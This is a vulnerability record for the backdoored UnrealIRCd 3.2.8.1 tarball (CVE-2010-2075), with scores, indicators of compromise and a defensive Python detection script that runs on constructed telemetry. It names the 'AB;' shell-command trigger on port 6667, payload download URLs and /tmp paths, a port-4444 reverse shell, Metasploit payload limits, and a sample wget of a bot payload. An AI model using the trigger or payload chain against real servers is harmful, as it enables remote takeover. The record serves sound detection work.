CVE-2010-2075
published 2010-06-15

CVE-2010-2075: UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse)…

Priority: P274 (high)
CVSS 2.0: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
Exploit: available
EPSS: 83.53% (99.6th percentile)
UnrealIRCd 3.2.8.1, as distributed on certain mirror sites from November 2009 through June 2010, contains an externally introduced modification (Trojan Horse) in the DEBUG3_DOLOG_SYSTEM macro, which allows remote attackers to execute arbitrary commands.

Affected (1 range)

Vendor: unrealircd
Product: unrealircd
Version range: (not given)
Fixed in: (not given)

Detection & IOCs (extracted from sources)

command: AB;
port: 6667
port: 4444
url: http://packetstormsecurity.org/groups/synnergy/bindshell-unix
url: http://efnetbs.webs.com/bot.txt
url: http://efnetbs.webs.com/r.txt
path: /tmp/bindshell
path: /tmp/bot
path: /tmp/rshell
filename: Unreal3.2.8.1.tar.gz
  • Detect the backdoor trigger string 'AB;' sent as the first bytes of a TCP connection to the IRC port (default 6667); any data following 'AB;' on the same line is executed as a shell command on the server.
  • Monitor for IRC server processes spawning child processes (e.g., /bin/sh) or making outbound connections to port 4444, which indicates a reverse shell established via the backdoor.
  • Alert on wget activity from /tmp by the ircd process, particularly downloading files and running chmod +x on them, as this matches known payload delivery chains for this backdoor.
  • The backdoor is triggered via the DEBUG3_DOLOG_SYSTEM macro; inventory the environment for UnrealIRCd 3.2.8.1, the only affected version.
  • The backdoor was present only in the Unreal3.2.8.1.tar.gz distributed from certain mirror sites during a specific window; official/clean distributions of the same version number are not affected.
  • The Metasploit module requires the payload type to be one of 'generic perl ruby bash telnet'; payloads outside this set will not function with the exploit.
  • The exploit payload space is limited to 1024 bytes; commands exceeding this size will not be delivered successfully.
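As an added example (not part of this record or of UnrealIRCd), the detection points above as runnable checks over constructed telemetry; the event shapes, the "ircd" process name, the shell paths and the sample URL are assumptions:

```python
from typing import Optional
IRC_PORTS = {6667}          # default IRC port named in the record
TRIGGER = b"AB;"            # backdoor trigger string named in the record
REVERSE_SHELL_PORT = 4444   # outbound port named in the record
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash"}  # assumption: common shells
IRCD_NAME = "ircd"          # assumption: process name of the IRC daemon

def check_conn(dst_port: int, first_line: bytes) -> Optional[str]:
    """If a session to an IRC port opens with the trigger, return the text
    after 'AB;' on that line (what the backdoored server would run)."""
    if dst_port not in IRC_PORTS or not first_line.startswith(TRIGGER):
        return None
    rest = first_line[len(TRIGGER):].split(b"\n", 1)[0].rstrip(b"\r")
    return rest.decode(errors="replace")

def check_proc(parent: str, exe: str, argv: list, cwd: str) -> Optional[str]:
    """Flag the IRC daemon spawning a shell or staging a payload in /tmp."""
    if parent != IRCD_NAME:
        return None
    if exe in SHELLS:
        return "ircd-spawned-shell"
    if (cwd == "/tmp" and argv[:1] == ["wget"]) or (
            argv[:2] == ["chmod", "+x"] and any(a.startswith("/tmp/") for a in argv[2:])):
        return "ircd-payload-staging-in-tmp"
    return None

def check_outbound(process: str, remote_port: int) -> Optional[str]:
    """Flag the IRC daemon connecting out to the reverse-shell port."""
    if process == IRCD_NAME and remote_port == REVERSE_SHELL_PORT:
        return "ircd-outbound-4444"
    return None

SAMPLE_CONNS = [  # constructed sample telemetry, not real captures
    (6667, b"NICK alice\r\nUSER alice 0 * :alice\r\n"),  # normal IRC handshake
    (6667, b"AB;id\r\n"),                                 # trigger on the IRC port
    (8080, b"AB;id\r\n"),                                 # same bytes, not IRC: ignored
]
SAMPLE_PROCS = [  # (parent, exe, argv, cwd); constructed, not real events
    ("ircd", "/bin/sh", ["sh", "-c", "id"], "/opt/unreal"),
    ("ircd", "/usr/bin/wget", ["wget", "http://example.invalid/bot.txt"], "/tmp"),
    ("sshd", "/bin/bash", ["bash"], "/root"),             # not the IRC daemon: ignored
]

def scan() -> list:
    """Run every check over the sample telemetry; returns hits in order."""
    hits = [("conn", c) for p, l in SAMPLE_CONNS if (c := check_conn(p, l)) is not None]
    hits += [("proc", r) for args in SAMPLE_PROCS if (r := check_proc(*args))]
    hits += [("net", r) for r in [check_outbound(IRCD_NAME, 4444)] if r]
    return hits
```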